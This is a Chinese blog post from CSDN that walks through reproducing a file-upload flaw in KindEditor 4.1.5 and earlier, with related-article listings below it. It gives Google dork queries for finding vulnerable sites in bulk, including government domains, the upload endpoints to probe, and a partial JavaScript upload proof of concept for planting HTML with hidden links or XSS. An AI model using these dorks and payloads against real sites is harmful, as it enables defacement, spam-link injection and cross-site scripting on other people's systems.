kingedit 上传php_kindeditor<=4.1.5上传漏洞复现

最新推荐文章于 2021-03-22 14:35:26 发布
最新推荐文章于 2021-03-22 14:35:26 发布
阅读量193 收藏
点赞数
文章标签: kingedit 上传php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39630999/article/details/111815998
版权

0x00 漏洞描述

漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.5编辑器中

这里html里面可以嵌套暗链接地址以及嵌套xss。Kindeditor上的uploadbutton.html用于文件上传功能页面,直接POST到/upload_json.*?dir=file,在允许上传的文件扩展名中包含htm,txt:extTable.Add("file","doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2")

0x01 批量搜索

在google中批量搜索:

inurl:/examples/uploadbutton.html

inurl:/php/upload_json.php

inurl:/asp.net/upload_json.ashx

inurl://jsp/upload_json.jsp

inurl://asp/upload_json.asp

inurl:gov.cn/kindeditor/

0x02 漏洞问题

根本脚本语言自定义不同的上传地址,上传之前有必要验证文件 upload_json.* 的存在

/asp/upload_json.asp/asp.net/upload_json.ashx/jsp/upload_json.jsp/php/upload_json.php

可目录变量查看是否存在那种脚本上传漏洞:

kindeditor/asp/upload_json.asp?dir=file

kindeditor/asp.net/upload_json.ashx?dir=file

kindeditor/jsp/upload_json.jsp?dir=file

kindeditor/php/upload_json.php?dir=file

0x03  漏洞利用

google搜素一些存在的站点 inurl:kindeditor

1.查看版本信息

http://www.xxx.org/kindeditor//kindeditor.js

2.版本是4.1.10可以进行尝试如下路径是否存在有必要验证文件 upload_json.*

kindeditor/asp/upload_json.asp?dir=file

kindeditor/asp.net/upload_json.ashx?dir=file

kindeditor/jsp/upload_json.jsp?dir=file

kindeditor/php/upload_json.php?dir=file

3.如下图可以看出是存在jsp上传点:

http://www.xxx.org/kindeditor/jsp/upload_json.jsp?dir=file

4.写出下面的构造上传poc,这里需要修改

Uploader

button : K('#uploadButton')[0],

fieldName :'imgFile',

url :'http://www.xxx.org/kindeditor/jsp/upload_json.jsp?dir=file',

afterUpload : function(data) {if (data.error === 0) {var url = K.formatUrl(data.url, 'absolute');

K('#url').val(url);}

},

});

uploadbutton.fileBox.change(function(e) {

uploadbutton.submit();

});

});

weixin_39630999
关注
(CVE-2017-1002024)Kindeditor <=4.1.11 上传漏洞
XZ_______的博客
04-22 641
漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.11编辑器中。
Kindeditor上传漏洞复现(CVE-2017-1002024)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-09 3402
Kindeditor上传漏洞复现(CVE-2017-1002024) 文章目录Kindeditor上传漏洞复现(CVE-2017-1002024)1. 漏洞简述2. 组件概述3. 漏洞原理4. 漏洞复现5. 漏洞验证5. 漏洞修复意见 复现环境土豪专用下载链接 https://download.csdn.net/download/qin9800/18510863 1. 漏洞简述 漏洞名称:Kindeditor上传漏洞 漏洞编号:CVE-2017-1002024 漏洞影响:黑页、钓鱼、XSS等 基础权限
kindeditor上传漏洞复现(CVE-2017-1002024)
qq_34853514的博客
08-09 3863
漏洞简介 漏洞编号: CVE-2017-1002024 漏洞详情: KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,在于小于等于kindeditor4.1.12 编辑器里,可以上传.txt和.html文件,支持php/asp/jsp/asp.net。 漏洞影响范围: kindeditor<=4.1.11 漏洞原理: upload_json.*中代码并没有对用户上传的文件格式,以及大小进行安全检测,导致用户可以伪造恶意文件进行上传,尤其html文件可以
html input上传文件_kindeditor<=4.1.5上传漏洞复现
weixin_39892481的博客
11-29 306
0x00 漏洞描述漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.5编辑器中这里html里面可以嵌套暗链接地址以及嵌套xss。Kindeditor上的uploadbutton.html用于文件上传功能页面,直接POST到/upload_json.*?dir=file,在允许...
kindeditor php 漏洞,kindeditor<=4.1.5 文件上传漏洞 | CN-SEC 中文网
weixin_39525865的博客
03-22 172
摘要漏洞存在于 kindeditor 编辑器里,你能上传. txt 和. html 文件,支持 php/asp/jsp/asp.net漏洞存在于 kindeditor 编辑器里,你能上传. txt 和. html 文件,支持 php/asp/jsp/asp.net漏洞存在于小于等于 kindeditor4.1.5 编辑器中根本脚本语言自定义不同的上传地址,上传之前有必要验证文件 upload_js...
kindeditor<=4.1.5上传漏洞复现
weixin_30236595的博客
02-23 406
0x00 漏洞描述 漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.5编辑器中 这里html里面可以嵌套暗链接地址以及嵌套xss。Kindeditor上的uploadbutton.html用于文件上传功能页面,直接POST到/upload_json.*?dir=file,在允...
kingcms php 漏洞,phpcmsV9.6 getshell
weixin_35817939的博客
03-13 340
这个漏洞来自乌云,经过本地环境测试后,发现漏洞确实存在。详细说明:PHP双字节编码,这个本不应该出现的问题,或许因为过去太久远快被遗忘了,phpcms从20140929的v9.5.9版本起,增加了mysqli的支持,因为编写疏忽,导致该问题又重现江湖。漏洞本身无需细说。phpcms默认使用mysqli数据库,显示mysql语句错误(debug为true,呵呵完全可以爆错注入),而且安装过程不能修改...
rails_kindeditor:用于Ruby on Rails的Kindeditor
02-06
rails_kindeditor将帮助您的rails应用程序与kindeditor集成,包括图像和文件上传。 安装及使用 将此添加到您的Gemfile gem 'jquery-rails' gem 'rails_kindeditor' 注意:Rails 5.1已从默认设置中删除了对jQuery...
kindeditor_kindeditor_截图_
10-03
1. **KindEditor 结构**:KindEditor 主要由若干个核心 JavaScript 文件组成,如 `kindeditor-all.js`、`kindeditor-min.js`、`kindeditor-all-min.js` 和 `kindeditor.js`。这些文件包含了编辑器的主要功能代码,...
kindeditor多图上传H5版(2020年12月-新版)
12-29
由于2020-12-31以后谷歌浏览器不再支持Flash,所以开发了一个H5版的上传,只需要简单的替换文件即可。 注意:如果使用kindeditor-all.js, 则需要将multiimage.js中的全部代码整体代替kindeditor-all.js中的对应部分,大约是:7837行开始。
在项目中集成kindeditor图片上传和编辑器功能
碎碎馮同學分享学习交流
05-02 4479
在项目中经常会遇到图片上传或者编辑器,以前使用百度插件,最近发现也kindeditor蛮好用滴 步骤: 1、下载kindeditor放在项目的/Public/kindeditor/ 2、配置kindeditorphp文件指定上传图片和文件保存的位置 /Public/kindeditor/php/*** upload_json.phpf 和 file_manager_json.ph
常见编辑器的漏洞利用
weixin_43352659的博客
01-07 1656
常见编辑器的漏洞利用 kindeditor编辑器 kindeditor 4.1 文件上传漏洞(中危、不能拿shell) 1、漏洞问题: Kindeditor能够上传doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2,wps,pdf格式文件且上传文件地 址通常携带“/kineditor/“的关键字。 找到对应/kindeditor/目录访问kind...
kindeditor php 漏洞,KindEditor漏洞、优化以及漏洞、BUG修复方案汇总
weixin_39772651的博客
03-22 1811
Kindeditor漏洞 编辑代码内容被执行kindeditor漏洞描述:在kindeditor编辑代码添加到数据库时没有任何问题,也就是一些HTML代码不会被执行,例如:web编程,这样的代码在首次编辑的时候没有被执行。但是,从数据库里取出来再放到kindeditor里进行修改的时候问题就出现了,这行HTML代码被执行了,结果这样:web编程 变成了超链接的形式。解决办法:先看下面这张图这张图是...
kindeditor编辑器<=4.1.5上传漏洞复现
p_utao的博客
12-11 1103
前期 谷歌语法搜索 inurl:/examples/uploadbutton.html inurl:/php/upload_json.php inurl:/asp.net/upload_json.ashx inurl://jsp/upload_json.jsp inurl://asp/upload_json.asp inurl:gov.cn/kindeditor/ 首先一定要看脚本语言,对症下药 /asp/upload_json.asp /asp.net/upload_json.ashx /
Kindeditor 漏洞导致网站被植入木马文件的解决办法
05-11 1120
很多建站公司都在使用Kindeditor开源的图片上传系统,该上传系统是可视化的,采用的开发语言支持asp、aspx、php、jsp,几乎支持了所有的网站可以使用他们的上传系统,对浏览器的兼容以及手机端也是比较不错的,用户使...
kindeditor php修改上传文件的保存路径(没问题!!!)
努力奋进,勇追不止……
11-05 3293
Kindeditor 是一款开源的html编辑器。 我使用的是php版本,修改路径的文件在/kindeditor/php/下的upload_json.php中。 第17行这: //文件保存目录路径 $save_path = $php_path . '../attached/'; //文件保存目录URL $save_url = $php_url . '../attached/'; 修改这两
KindEditor 文件上传漏洞漏洞
热门推荐
mei_13的博客
07-31 1万+
1 漏洞简介 1.1 漏洞描述 KindEditor是一套开源的HTML可视化编辑器,使用JavaScript编写,支持asp、aspx、php、jsp,几乎支持了所有的网站,该编辑器主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器,非常适合在CMS、商城、论坛、博客、Wiki、电子邮件等互联网应用上使用。且该编辑器支持上传功能,如果上传文件类型控制的不好,那么我们就能利用该漏洞上传doc,docx,xls,xlsx,ppt,h
kingedit 上传php_PHP注入实例之PHP网站系统入侵(图)
weixin_31727937的博客
01-13 97
听承诺说CASI出2.0了,而且承诺也给了一个有漏洞的地址,正好没事就测试了一下,最近非常郁闷,学不下去,正好今天承诺勾起了我学习php的美好时光,看看自己还能不能搞这样的站吧.过程:;很标准的php注入形式,我们也按照标准的php注入方法来进行注入,首先再后面加一个','如图1他告诉我们2个方面的信息,第一是magic_quotes_gpc = off第二个就是web路径/home/newgt/...
Kindeditor集成七牛云上传实例教程
本文将详细介绍如何在Kindeditor中集成七牛云上传功能,以便用户可以在编辑器中方便地上传图片。我们将探讨两种主要的七牛云上传方法:服务端上传和前端上传,其中前端上传又分为重定向返回和回调返回两种策略,以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值